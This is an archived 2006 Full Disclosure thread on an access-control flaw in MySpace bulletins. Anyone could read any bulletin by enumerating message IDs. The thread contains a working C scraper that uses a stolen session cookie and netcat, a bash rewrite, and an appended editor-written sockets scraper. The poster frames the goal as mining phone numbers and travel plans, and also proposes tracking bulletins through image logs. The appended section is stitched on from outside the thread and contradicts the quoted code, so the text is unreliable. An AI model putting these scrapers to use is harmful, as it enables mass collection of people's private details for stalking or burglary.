Full Disclosure mailing list archives
Re: Data Mining Myspace Bulletins
From: "Morgan Reed" <morgan.s.reed () gmail com>
Date: Sun, 2 Jul 2006 17:03:07 +1000
Or if you must use netcat, don't use system(); write a shell script.
================================================
#!/bin/bash
# bash rather than sh: the (( )) arithmetic for-loop below is a bashism
if [ $# != 2 ]; then
    echo "Usage: $0 <start> <end>"
    exit 1
fi
if [ "$1" -gt "$2" ]; then
    echo "end must be greater than start"
    exit 2
fi
recs=$(( $2 - $1 + 1 ))
for (( i=0; i<recs; i++ )); do
    id=$(( i + $1 ))
    # the C PoC's "%0.lf" is a printf format, not part of the URL or file name
    echo "GET /index.cfm?fuseaction=bulletin.read&messageID=${id} HTTP/1.1" > new_request.txt
    cat request.txt >> new_request.txt
    echo "Downloading bulletin #${i} of $(( recs - 1 )), $(( recs - i - 1 )) remaining"
    nc -w2 bulletin.myspace.com 80 < new_request.txt > "bulletin/${id}.html"
done
================================================
Untested 5 minute hack but should work identically to the C PoC.

On 7/2/06, GroundZero Security <fd () g-0 org> wrote:
Couldn't you have used sockets? It's just a simple connect(), what's the big deal? Using netcat, trusting the env and using system() is baaad :-)

----- Original Message -----
From: "John Hackenger" <stderr () pandora-security com>
To: <full-disclosure () lists grok org uk>
Sent: Saturday, July 01, 2006 12:38 AM
Subject: [Full-disclosure] Data Mining Myspace Bulletins

> Myspace Bulletins: The good, the bad, and the ugly
>
> Data Mining Myspace, a case study
>
> Author: stderr (stderr () pandora-security com)
> http://stderr.linuxinit.net
>
> Original release:
> http://www.pandora-security.com
>
> ------------------------------------------------------
>
> 1. Abstract
>
> We all know about myspace.com, and I'll go ahead and admit
> that I actually have an account to keep up with friends.
> Myspace is full of a bunch of idiots, but it can be a great
> tool for keeping up with people... when used properly.
>
> Myspace has long been a hacker playground; you may remember
> the infamous "Samy is my hero" "worm". The "worm" took advantage
> of several poor input validation techniques which were being
> employed. Each person that went to a page with his script in it
> automatically sent him a friend request. After this alarming
> stunt, Myspace fixed a lot of the injection vulnerabilities.
>
> ------------------------------------------------------
>
> 2. Introduction to Bulletins
>
> On Myspace, you can send "bulletins" which are sent to all
> of the friends on your list. That way if you're going on
> vacation or something, you can let ALL of your friends know
> what's happening by sending only one message. Most people
> assume that only their friends can read the bulletins they
> post... they are sadly mistaken.
>
> When you open up a bulletin, you go to a url like the following.
>
> http://bulletin.myspace.com/index.cfm?fuseaction=bulletin.read&messageID=111111111
>
> Yes, you guessed it. If you change the messageID number,
> you can view any bulletin on Myspace that hasn't yet
> expired. Now, if we could just collect a ton of bulletins,
> then we could surely find some juicy information like
> cell phone numbers, when people are leaving for vacation,
> where they're going... the list goes on and on.
>
> The implementation of bulletins so that everyone can view them
> may be intentional, but most people assume that bulletins are
> only readable by friends. Because of this belief, many people
> post personal details in bulletins, never expecting people
> like you to read them. The mere existence of the "Delete from
> friends" button implies that only friends should be able to
> read your bulletins.
>
> ------------------------------------------------------
>
> 3. Mining the data
>
> I was able to whip together a small C program that generates
> urls, retrieves the bulletin, and saves the html to a file.
> Once all of the data has been downloaded, it's easy to parse
> through using a tool like grep.
>
> In order for this program to work, you need to download a
> tool called 'netcat'. You will also need to get your cookie
> once you're logged into myspace, so that you can view the
> bulletins.
>
> First of all, let's create a new file named "request.txt".
> The contents should look something like this, but you'll need
> to change the cookie to match yours.
>
> =======================================================
>
> Host: bulletin.myspace.com
> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13)
> Gecko/20060414
> Accept: application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html
> ;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1
> Accept-Language: en-us,en;q=0.5
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Keep-Alive: 300
> Connection: keep-alive
> Cookie: TIMEZONE=3;
> ODZDBXZG9tY#luPXXhaG#vJSRsZD1DXEWQSASLKJFLAJF;ODIJ;AEIJOIJDFOIAJEDKL124DADK
> ADS;IFJO;IEAJOIFEA89U;FIO;23A;OIJDSJAOIJOIEJWAIJLDOISJFOIJ39812H12O8JAW098320AJDSLKJ32AOJ12LIJ4
> A;OIJ;S;OAIJMCOISJAO8JOIRA2J38U2398JIOAJDFKANKJCNLUIHA8W734HLAIL2L3ANUHDLUIAHF87Y3LAHAKDJHF8L83
> 5PVVTJmRhdGluZz0wJmRyaW5rZXI9MCZlZHVjYXRpb25pZD0x;
> NGUserID=a258ca5-2341-1231956342-6;
> MYSPACE=myspace; AUTOSONGPLAY=0;
> UNIQUELOGINTAKEOVER_10207218=%7Bts%20%272006-06-2df%047%3A32%x
> A18%27%7D; MSCOUNTRY=US; FRNDIDxr2g=55555555; rsi_want=0;
> COUNTRYCODE=MFMGCisGAQQBgjdYA7GgRTBDB
> gorBgEEAYI3WAMBoDUwMwIDAgABAgJmAwICAMAECHndruAVl3qwBBBgdJZ9K7N%2F34aRlhOz2UArBAi%2BqGfSVTRm7w%3
> D%3D; MSCulture=IP=127.0.0.1&IPCulture=en-US&PreferredCulture=en-US&Country=US;
> MYUSERINFO=saoijaoi;joiewjaoijdosiajdklajfoijADFJIEAJKDJFIJIEAdlkjlijelaijalidjflijaslijldsijli
> AIDFJIAEwjfoiajdfeAIJDfAOJeagEOJeAJDalkjdadfAEJaijadlijfdilakmckj85423alkjdklafjdlkajdklajlkjea
> aDJFAILJJae'oifja;3o4ijmaidjalkfmaijkladfjalkjfioeajlkmdmc,jkjiojoia3wjiojfoiejaoija;odijflkjda
> ALOAJKEIOAJF3ea:LKfoaidjiajsioajlk3jaijdkfhfkjghncx,jlkjaweoijroiajoijadsljfdlksajfij32lja;dljf
> aDJFOA:#oKkdjflkaj;ijIOJilj;ioje;ioHiuhNKJhUGJJikhiugygGTYFTJHKHIUgyuhihiugI:HUgugyfTHDGfyjgfff
> 2FADFaEFeaDfagFhGHggFgadcAweadddafdasfeafgeaeageaijlkfjai;hj;JIOJlihluhkHUIHKhuilgliuHLIUHLHhhh
> h0DSAFOOJaewoi'jfa;ilj;oi:IOnjiehjioh;iH:IH;iohi;hg;juGYFyjfyjflukhaljdkfaejoijlajdlifjealijddd
> WIaOJFoa;ejklijdaFOJEaIjo:IJEAOIJEoajf:EOJAjdailjdf;ilaj;lijioj;oije;aojojaoijoiej;oaijo;ij;oij
> hNaoijao;ijdoifj;ckxx,jaiojeifajkjnaklhugi834829ijljadflkj3alijadlkjfaeljaclijeakjdoijgealijdcd
> Fsaijo;ij3;oaij;oijod;iasj;oijx90asjoij3alij;ioadjf;iojeo;iaj;oij;dkjfkdjlakjdlska;
> LASTUSERCLICK=%7bts+'2006-06-21+15%3a64%3a52'%1f;
> CAPTCHA=02236762-de4c-133a-a5e2-ff558427f513
>
> =======================================================
>
> Now that you have the request.txt file all set up, let's go
> ahead and compile the C program that will mine the data.
>
> scan.c
>
> =======================================================
>
> /*************************************************
>  * scan.c -- Myspace bulletin miner               *
>  * Author: stderr (stderr () pandora-security com) *
>  * Usage: ./scan 1164147677 1164147678            *
>  * The ending ID should be greater than the       *
>  * starting ID, that or you could always          *
>  * reverse the loop in the body of the program.   *
>  *                                                *
>  * (Note) I'm sure this could be done a lot more  *
>  * elegantly, maybe even with perl or something   *
>  * But... this is just a proof of concept, so..   *
>  * No hating :)                                   *
>  *************************************************/
>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
>
> void usage(char *name);
>
> int main(int argc, char *argv[])
> {
>     double id, s_id, e_id;
>     int x;                      /* int, not char: fgetc() returns EOF as an int */
>     char url[256];
>     FILE *in_file, *out_file;
>
>     if (argc != 3) {
>         usage(argv[0]);
>         exit(1);
>     }
>
>     /* strtod rather than atoi: real message IDs such as 4264287677
>      * do not fit in a 32-bit int */
>     s_id = strtod(argv[1], NULL);
>     e_id = strtod(argv[2], NULL);
>
>     if (s_id >= e_id) {
>         printf("The ending ID must be greater than the starting ID\n");
>         exit(1);
>     }
>
>     for (id = s_id; id < e_id; ++id) {
>         in_file = fopen("request.txt", "r");
>         out_file = fopen("new_request.txt", "w");
>         if (in_file == NULL || out_file == NULL) {
>             perror("fopen");
>             exit(1);
>         }
>
>         /* request line first, then the saved headers (Host, Cookie, ...) */
>         fprintf(out_file, "GET /index.cfm?fuseaction=bulletin.read&messageID=%0.lf HTTP/1.1\n", id);
>         while ((x = fgetc(in_file)) != EOF)
>             fputc(x, out_file);
>         fclose(in_file);
>         fclose(out_file);
>
>         printf("Downloading Bulletin #%0.lf ... %0.lf bulletins left.\r", id, e_id - id);
>         fflush(stdout);         /* "\r" progress line is not shown without a flush */
>         sprintf(url, "nc -w2 bulletin.myspace.com 80 < new_request.txt > bulletin/%0.lf.html\n", id);
>         system(url);
>     }
>     /* the original ended with system("pause"), which only exists on Windows */
>     return 0;
> }
>
> void usage(char *name)
> {
>     printf("%s <start message id> <ending message id>\n", name);
> }
>
> =======================================================
>
> Now compile the program, and run something like this...
>
> ./scan 4264287677 4264287777
>
> (Note) Before running the program, you'll need to make a directory
> called "bulletin" so that the program will save the bulletins to
> their own directory. If you don't like that setup, then change the
> code.
>
> You should now have a bunch of bulletins downloaded; now just grep
> through the "bulletin" directory for the data that you're looking
> for.
>
> ------------------------------------------------------
>
> 4. More fun with Bulletins
>
> If you have a Myspace account, you've undoubtedly encountered a lot of spam
> bulletins. Another idea to play with bulletins is to add an image
> in the bulletin, and start forwarding it around. The image that's pointed
> to should be on a server where you have access to the logs. Once people
> start circulating the bulletin, it's possible to see how many times it's
> been forwarded by looking at the referrer. To the best of my knowledge
> there's no way of getting the name of each person that reads the
> bulletin, but you will obviously have the name of each person that
> forwards the bulletin.
>
> ------------------------------------------------------
>
> 5. Closing Statements
>
> Whether this is a "flaw" that is going to be closed remains to be seen.
> As always, just be careful with the information you're posting on the
> internet. You never know who's watching.
>
> Shouts: zipk0der, XPlicit, exvitel, Sonic, and Darcy
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
--
"They that can give up essential liberty to obtain a little temporary safety
deserve neither liberty nor safety."
-- Benjamin Franklin, 1759
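The sockets version GroundZero asks for, as an added example written for this page; it is not code from anyone in the thread. It keeps the original PoC's request.txt, bulletin/ directory and URL, but reads the IDs with strtoull (the original's atoi() overflows on IDs such as 4264287677), builds the request with CRLF line endings, and talks to the server through connect()/send()/recv() instead of system("nc ..."). It assumes request.txt carries a "Connection: close" header so the response ends in EOF; the helper names parse_id, build_request and fetch_one are this example's own.

```c
/* Added example for this thread (editor's code, not the poster's): the same
 * fetch loop done with connect()/send()/recv() instead of system("nc ...").
 * Assumptions: request.txt holds the extra headers (Host, Cookie, ...) and
 * includes "Connection: close" so recv() sees EOF; parse_id, build_request
 * and fetch_one are names chosen here, not from the original PoC. */
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>

#define HOST "bulletin.myspace.com"
#define PATH "/index.cfm?fuseaction=bulletin.read&messageID="

/* Parse a message ID as unsigned 64-bit. atoi() silently overflows on IDs
 * above 2^31-1 such as 4264287677 from the original post. 0 on success. */
int parse_id(const char *s, unsigned long long *out)
{
    char *end;
    if (*s == '-' || *s == '+') return -1;          /* IDs are plain digits */
    errno = 0;
    unsigned long long v = strtoull(s, &end, 10);
    if (errno != 0 || end == s || *end != '\0') return -1;
    *out = v;
    return 0;
}

/* Build the request: request line, one CRLF-terminated line per header in
 * `headers` (blank lines skipped, stray CRs dropped), then the empty line
 * that ends the header block. Returns the length, or -1 if buf is too small. */
int build_request(char *buf, size_t cap, unsigned long long id, const char *headers)
{
    int n = snprintf(buf, cap, "GET %s%llu HTTP/1.1\r\n", PATH, id);
    if (n < 0 || (size_t)n >= cap) return -1;
    size_t used = (size_t)n;
    for (const char *p = headers; *p; ) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len && p[len - 1] == '\r') len--;
        if (len) {
            if (used + len + 2 >= cap) return -1;
            memcpy(buf + used, p, len);    used += len;
            memcpy(buf + used, "\r\n", 2); used += 2;
        }
        if (!nl) break;
        p = nl + 1;
    }
    if (used + 3 > cap) return -1;
    memcpy(buf + used, "\r\n", 2); used += 2;      /* end of headers */
    buf[used] = '\0';
    return (int)used;
}

/* Connect to HOST:80, send one request, copy the raw response to `out`.
 * Returns 0 on success, -1 on any failure. */
int fetch_one(unsigned long long id, const char *headers, FILE *out)
{
    static char req[20480];
    char chunk[4096];
    int len = build_request(req, sizeof req, id, headers), fd = -1, rc = -1;
    struct addrinfo hints, *res = NULL;
    if (len < 0) return -1;
    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    if (getaddrinfo(HOST, "80", &hints, &res) != 0) return -1;
    fd = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
    if (fd >= 0 && connect(fd, res->ai_addr, res->ai_addrlen) == 0) {
        ssize_t r = 0; int sent = 0;
        while (sent < len && (r = send(fd, req + sent, (size_t)(len - sent), 0)) > 0)
            sent += (int)r;
        if (sent == len) {                    /* read until the server closes */
            while ((r = recv(fd, chunk, sizeof chunk, 0)) > 0)
                fwrite(chunk, 1, (size_t)r, out);
            rc = (r == 0) ? 0 : -1;
        }
    }
    if (fd >= 0) close(fd);
    freeaddrinfo(res);
    return rc;
}

int main(int argc, char **argv)
{
    static char headers[16384];
    unsigned long long s_id, e_id, id;
    FILE *f;
    if (argc != 3 || parse_id(argv[1], &s_id) || parse_id(argv[2], &e_id) || s_id > e_id) {
        fprintf(stderr, "usage: %s <start id> <end id>   (start <= end)\n", argv[0]);
        return 1;
    }
    if (!(f = fopen("request.txt", "r"))) { perror("request.txt"); return 1; }
    headers[fread(headers, 1, sizeof headers - 1, f)] = '\0';
    fclose(f);
    for (id = s_id; id <= e_id; id++) {       /* inclusive range, unlike the original */
        char name[64];
        snprintf(name, sizeof name, "bulletin/%llu.html", id);
        FILE *out = fopen(name, "w");
        if (!out) { perror(name); return 1; }
        int rc = fetch_one(id, headers, out);
        fclose(out);
        fprintf(stderr, "%llu: %s\n", id, rc == 0 ? "saved" : "failed");
    }
    return 0;
}
```

Compile with `cc -o scan2 scan2.c` (file name chosen here) and run `./scan2 <start> <end>` from the directory holding request.txt and bulletin/. Because the request is assembled in memory, no ID or file name ever reaches a shell, and the range check happens on the parsed 64-bit value rather than on a truncated int.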
Current thread:
- Re: Data Mining Myspace Bulletins GroundZero Security (Jul 01)
- Re: Data Mining Myspace Bulletins Morgan Reed (Jul 02)
- Re: Data Mining Myspace Bulletins John Hackenger (Jul 02)
- <Possible follow-ups>
- Re: Data Mining Myspace Bulletins daylasoul (Jul 02)
- Re: Re: Data Mining Myspace Bulletins Line Noise (Jul 02)
- Re: Re: Data Mining Myspace Bulletins <...> (Jul 03)
- Re: Re: Data Mining Myspace Bulletins Line Noise (Jul 02)
- Re: Data Mining Myspace Bulletins Morgan Reed (Jul 02)